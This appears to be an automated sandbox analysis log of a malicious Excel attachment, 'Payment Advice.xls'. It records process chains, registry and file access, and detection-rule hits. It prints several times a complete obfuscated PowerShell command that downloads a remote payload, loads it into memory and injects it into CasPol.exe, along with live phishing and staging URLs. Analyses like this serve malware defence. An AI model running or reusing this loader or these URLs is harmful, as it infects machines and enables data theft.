              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
              Source: Payment Advice.xlsOLE indicator, VBA macros: true
              Source: Payment Advice.xlsStream path 'MBD00CFD366/\x1Ole' : https://acesso.run/j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis?^;Z=@Krft)93IJf/;f0Z ^VN|Zd)~=wD\Mu9]&\n^eoX=D7jICQ&_1RX'pXyl?;KyR]oK0-.&O6lDu{\{*Yp@(`qzLln-|~Cw6AcuAHL63jfpljtiwj1NOaiYmB79WfN5sLN48uvBXPIXlk37iKlhPoWj3wvBTilxvYRKlltnUriKyDGM3bcinGoBaTUkPPqJuUW6LwTxlu2Sfu2kMVkcScXkNXgFLpDsrfEAjkPOi4qP64DFMDFkJ51q5gvAsFusTUuPC4!h{~HMxCzg
              Source: A5330000.0.drStream path 'MBD00CFD366/\x1Ole' : https://acesso.run/j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis?^;Z=@Krft)93IJf/;f0Z ^VN|Zd)~=wD\Mu9]&\n^eoX=D7jICQ&_1RX'pXyl?;KyR]oK0-.&O6lDu{\{*Yp@(`qzLln-|~Cw6AcuAHL63jfpljtiwj1NOaiYmB79WfN5sLN48uvBXPIXlk37iKlhPoWj3wvBTilxvYRKlltnUriKyDGM3bcinGoBaTUkPPqJuUW6LwTxlu2Sfu2kMVkcScXkNXgFLpDsrfEAjkPOi4qP64DFMDFkJ51q5gvAsFusTUuPC4!h{~HMxCzg
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2346
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2346
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2346Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2346
              Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3860, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@33/47@9/6
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\A5330000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR954C.tmpJump to behavior
              Source: Payment Advice.xlsOLE indicator, Workbook stream: true
              Source: A5330000.0.drOLE indicator, Workbook stream: true
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m......&.......................&.......&.......................3.......................&..............Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..............P................m.......m.....}..w.............................1......(.P..............3........!.............@...............Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....................(...............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w.............4Q........l....P.P.....(.P.......................!.............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....................(...............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w.............4Q........l....P.P.....(.P.......................!.............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..4Q........l....P.P.....(.P............................. .......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.e.v.I.C.e.c.r.e.D.e.n.T.i.a.l.d.E.p.l.o.Y.M.E.n.T...e.x.e.........................@.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w.............4Q........l....P.P.....(.P.......................!.............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w.............4Q........l....P.P.....(.P.......................!.....l.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.......}..w.............4Q........l....P.P.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......(...............p...............Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................(...............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.......}..w............8.......8.......@"......(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................04@k....}..w....p.......\.......................(.P.....................X...............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1......4@k....hJ......(.P.............................$.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................04@k....}..w....p.......\.......................(.P.....................X...............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.......}..w............`.|......4@k....hJ......(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.......}..w............`.|......4@k....hJ......(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.......}..w............`.|......4@k....hJ......(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.......}..w............`.|......4@k....hJ......(.P.............................T.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......p.......}..w............`.|......4@k....hJ......(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m..............................................................3......x...............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.............l.......x...............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................u..............
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................=.l....}..w.....u......\.......................(.P.............l.......................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................u......}..w..............M......<.l....x.L.....(.P.............l.......................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................=.l....}..w.....u......\.......................(.P.............l.......................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................u......}..w..............M......<.l....x.L.....(.P.............l.......................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....X.......N.......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...M......<.l....x.L.....(.P.............l.......X....... .......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.e.v.I.C.e.c.r.e.D.e.n.T.i.a.l.d.E.p.l.o.Y.M.E.n.T...e.x.e.........l.......X.......@.......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........l.......X.......@.......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................u......}..w..............M......<.l....x.L.....(.P.............l.......................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...X.......N.......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................u......}..w..............M......<.l....x.L.....(.P.............l...............l.......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........u......}..w..............M......<.l....x.L.....(.P.............l.......X...............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......X................b..............
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.............d.......X...............................
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
